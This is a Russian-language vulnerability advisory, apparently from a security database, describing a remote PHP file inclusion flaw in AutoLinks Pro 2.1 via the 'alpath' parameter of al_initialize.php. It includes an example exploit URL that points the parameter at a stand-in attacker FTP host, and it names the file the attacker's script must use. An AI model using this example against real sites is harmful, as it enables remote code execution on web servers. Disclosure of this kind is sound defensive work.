PHP инклюдинг в AutoLinks Pro

Дата публикации:
01.09.2005
Дата изменения:
17.10.2006
Всего просмотров:
2342
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
AutoLinks Pro 2.x
Уязвимые версии: AutoLinks Pro 2.1

Описание:
Уязвимость позволяет удаленному пользователь выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.

Уязвимость существует в сценарии 'autolinks/al_initialize.php' при обработке входных данных в параметре 'alpath' при включенной опции register_globals в конфигурационном файле php.ini. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://[target]/al_initialize.php?alpath=ftp://[attacker]/

Примечание: Сценарий атакующего должен быть назван 'al_functions.php'.

URL производителя: www.scriptscenter.com/autolinks/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: [NewAngels Advisory #1] AutoLinks Pro 2.1 - Remote File Include Vulnerability

или введите имя

CAPTCHA